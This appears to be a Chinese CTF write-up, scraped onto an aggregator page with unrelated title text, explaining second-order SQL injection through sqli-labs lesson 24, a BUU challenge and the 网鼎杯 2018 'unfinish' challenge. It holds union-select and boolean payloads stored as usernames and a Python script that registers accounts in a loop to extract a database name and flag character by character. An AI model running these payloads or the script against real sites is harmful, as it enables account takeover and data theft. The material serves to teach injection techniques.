当前位置：首页 > news >正文

淘宝网站建设退款wordpress应用和lamp

news 2025/11/9 17:29:53

淘宝网站建设退款,wordpress应用和lamp,建设视频网站设计意义,wordpress每段不同图片原理用户向数据库存入恶意数据，当数据被送进数据库的时候，会对存入的信息进行转义然后再储存，但是存进去的数据会再次被转义回来（也就是原样不变的存进数据库里，只是害怕攻击者在存入数据的时候捣蛋而已）…

原理

用户向数据库存入恶意数据，当数据被送进数据库的时候，会对存入的信息进行转义然后再储存，但是存进去的数据会再次被转义回来（也就是原样不变的存进数据库里，只是害怕攻击者在存入数据的时候捣蛋而已），一般默认数据库里的数据都是安全的，所以当用户再次访问时，要从数据库里拿出数据来，这时候就不会再进行转义处理，此时会引起SQL注入

用基本例题来说明原理

以sql靶场的lesson24为例：

先注册一个账号 admin'# 密码随便，这时候因为经过转义，没有造成SQL注入

点击更新密码，更新username为 admin'# 的密码

在更新密码的php中有：

$ sql = "UPDATE users SET PASSWORD='$ pass' where username='$ username' and password='$ curr_pass' ";

传入username=admin'#后：

$ sql = "UPDATE users SET PASSWORD='$ pass' where username='admin'#' and password='$ curr_pass' ";

此时执行的就是：

$ sql = "UPDATE users SET PASSWORD='$ pass' where username='admin'

修改的不是admin'#的密码而是admin的

也就是说我们没输入admin当前的密码就直接把admin的密码给改了

BUU October 2019 Twice SQL Injection 1

有个登录界面也有个注册界面，登进去以后有个Info上传功能

一开始想从Info入手，先上传上去SQL注入语句，这是上传的过程，然后logout，再登录进去加载Info，就是从数据库中取出数据的过程，然后执行SQL语句，但是一直没成功...

然后看了看wp才知道，原来是在register和login之间玩的啊，考。。。

先register用户名是恶意语句的账号，这时候就存进去数据库了，然后再login这个账号，此时会从数据库里掏出来这个恶意语句，然后执行SQL命令

register：username=1' union select database() #(末尾有没有 ; 都一样)

register：username=1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#

奇了老鼻子怪了，登进去就是啥也没有

跟答案一比较，感觉一模一样啊，为啥不对，然后dp：

出错的原因在于普通空格被当成分隔符，但是全角空格会被当成正常的字符，把它当成任意非空字符看，这时候就会出现单引号闭合不了的问题，产生报错

好好好这么玩是吧

剩下的内容就是常规SQL注入了

[网鼎杯 2018]unfinish

花了一张蓝色毛爷爷做的题，疼死我了

打开以后只有登录界面

登录界面怎么可能没有注册界面呢，尝试一下register.php

先注册一个账号，发现是在用户名处回显内容

然后再从用户名里面搞事情，但是我注册了几个诸如 1' union select database() #都登录不进去，好像是被过滤了，我所有招数都被他过滤了呜呜呜

网上看的，利用布尔盲注

全新写法，逐字符泄露database的名字

0'+ascii(substr((select database()) from 1 for 1))+'0

username='0' + [表达式] + '0' ，也就是说在username中会回显出每一个字符的ascii码

感觉这个脚本写的还挺好的，反正我写不出来

#coding:utf-8
import requests
from bs4 import BeautifulSoup
import timeurl = 'http://node4.anna.nssctf.cn:28137/'m = ''
for i in range(100):#payload = "0'+ascii(substr((select database()) from {} for 1))+'0".format(i + 1)payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)#判断每一位ascii码是多少register = {'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'}login = {'email':'abc{}@qq.com'.format(i),'password':'123456'}req = requests.session()r1 = req.post(url+'register.php',data = register)r2 = req.post(url+'login.php', data = login)r3 = req.post(url+'index.php')html = r3.text#print(html)soup = BeautifulSoup(html,'html.parser')#print(soup.prettify())UserName = soup.span.stringprint(UserName)if int(UserName) == 0:breakm += chr(int(UserName))print(m)time.sleep(1)

查看全文

http://www.dtcms.com/a/587273.html